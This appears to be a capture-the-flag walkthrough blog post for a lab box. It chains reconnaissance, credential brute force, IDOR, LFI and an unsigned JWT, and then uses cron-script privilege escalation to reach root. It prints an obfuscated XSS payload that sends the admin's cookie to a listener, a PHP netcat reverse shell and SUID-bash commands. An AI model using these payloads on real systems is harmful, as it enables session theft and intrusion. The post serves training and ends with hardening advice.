June 15, 2026
Domino CTF
Chain together vulnerabilities in a cascading attack, where every piece you find knocks over the next.
Rahul Dhakate
3 min read
Interestingly, this environment contains no traditional vulnerabilities; instead, it emphasizes misconfigurations across web applications, networks, and host systems. This makes it an excellent exercise in real-world exploitation scenarios.
๐ Network Level Reconnaissance
Open Port Scanning
nmap -sS -p- 10.49.93.21nmap -sS -p- 10.49.93.21
Service Enumeration
nmap -sS -sC -sV -p 22,80 10.49.93.21nmap -sS -sC -sV -p 22,80 10.49.93.21
- Port 80: Public-facing web application โ NexusCorp Portal
- Backend: Apache2 on Linux
Local DNS Resolution
echo "10.49.93.21 nexuscorp.thm" >> /etc/hostsecho "10.49.93.21 nexuscorp.thm" >> /etc/hosts
๐ Web Application Analysis/Recon
- index.php โ Login page (username format:
firstname.lastname) - team.php โ Reveals list of usernames
- forget.php โ No immediate findings
- reset.php โ Requires JWT token
Directory Enumeration
ffuf -h http://nexuscorp.thm/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -mc all -fs 275 -e .php,.txt,.json,.bak,.log,.apiffuf -h http://nexuscorp.thm/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -mc all -fs 275 -e .php,.txt,.json,.bak,.log,.apiImportant endpoint
auth.phpconfig.php
Backup & Static Directories
- backup/ โ Contains encrypted binary
config.enc - static/ โ Contains AES-ECB-128 key
N3xusK3y2024!!
Decrypting configuration:
-K is hex value of N3xusK3y2024!!
openssl enc -d -aes-128-ecb -in config.enc -out config.dec -K 4e337875734b33793230323421210000openssl enc -d -aes-128-ecb -in config.enc -out config.dec -K 4e337875734b33793230323421210000
๐ Exploitation
IDOR Vulnerability
Bruteforce login with username found in team.php using Hydra:
hydra -L usernames.txt -P /usr/share/wordlists/rockyou.txt nexuscorp.thm http-post-form '/index.php:username=^USER^&password=^PASS^:Invalid'hydra -L usernames.txt -P /usr/share/wordlists/rockyou.txt nexuscorp.thm http-post-form '/index.php:username=^USER^&password=^PASS^:Invalid'
Successful login as robert.wilson
Endpoints discovered:
/api/files.php?name/api/auth/token.php- Profile API vulnerable to IDOR
Change the id =1 to obtain First flag
Stored XSS
Injecting payload via support ticket:
XSS payload to get admin browser session token
<IMG src=x onerror="fe"+"tch"('http://10.49.93.21:4444/?c='+"doc"+"ument"."coo"+"kie")><IMG src=x onerror="fe"+"tch"('http://10.49.93.21:4444/?c='+"doc"+"ument"."coo"+"kie")>
- Captured admin cookie with Netcat listener
- Set the cookie
- Accessed admin dashboard โ Second flag obtained
Local File Inclusion (LFI)
Accessing sensitive files:
/api/files.php?name=/var/www/html/config.php /api/files.php?name=/var/www/html/auth.php
JWT manipulation allowed viewing of config.php โ Database credentials harvested.
"Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsYXVyYS5oYXllcyIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTc4MTUzMjc0MSwiZXhwIjoxNzgxNTM2MzQxfQ.""Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsYXVyYS5oYXllcyIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTc4MTUzMjc0MSwiZXhwIjoxNzgxNTM2MzQxfQ."
System Level Recon
SSH Access as DevOps:
From the CTF page and decrypting config.enc, we already knew a devops user existed. Using the credentials harvested from config.php, we attempted an SSH login:
ssh devops@10.49.141.39ssh devops@10.49.141.39This provided direct access to the system as devops, immediately revealing the fourth flag. By logging in as devops instead of pivoting through the www-data user, we effectively skipped the third flag step โ but in doing so, we gained both the third and fourth flags together.
Remote File Inclusion (RFI)
This is for information purpose, you can skip this step, because already logged as devops user in previous task.
Uploaded reverse shell:
shell.php
<?php exec("busybox nc 10.49.93.21 4001 -e bash"); ?><?php exec("busybox nc 10.49.93.21 4001 -e bash"); ?>
File server:
python3 -m http.serverpython3 -m http.serverListener:
nc -lvnp 4001nc -lvnp 4001
- Reverse shell established
- Third flag confirmed
note: Perform ssh login using devops for next steps
Privilege escalation:
- Used
pspy64to monitor micro jobs
- Modified root-owned scripts (
admin_bot.py,health_report.sh)
vi /opt/monitoring/health_report.sh
cp /bin/bash /tmp/bash ; chmod u+s /tmp/bash
cp /root/root.txt /tmp/root.txt; chmod 777 /tmp/root.txt
vi /opt/monitoring/health_report.sh
cp /bin/bash /tmp/bash ; chmod u+s /tmp/bash
cp /root/root.txt /tmp/root.txt; chmod 777 /tmp/root.txt
- Escalated privileges with SUID bash
- Final flag obtained
๐ Conclusion & Recommendations
This CTF highlights how misconfigurations can be just as dangerous as traditional vulnerabilities. Key lessons include:
- ๐ Harden configurations: Ensure proper file permissions, secure JWT handling, and avoid exposing sensitive directories.
- ๐งโ๐ป Monitor user input: Prevent IDOR and XSS by validating and sanitizing requests.
- ๐ก Least privilege principle: Avoid running scheduled tasks with root privileges unnecessarily.
- ๐ Logging & monitoring: Detect brute-force attempts and unusual activity early.
- ๐Defense-in-Depth: Combine secure coding, configuration management, and continuous monitoring.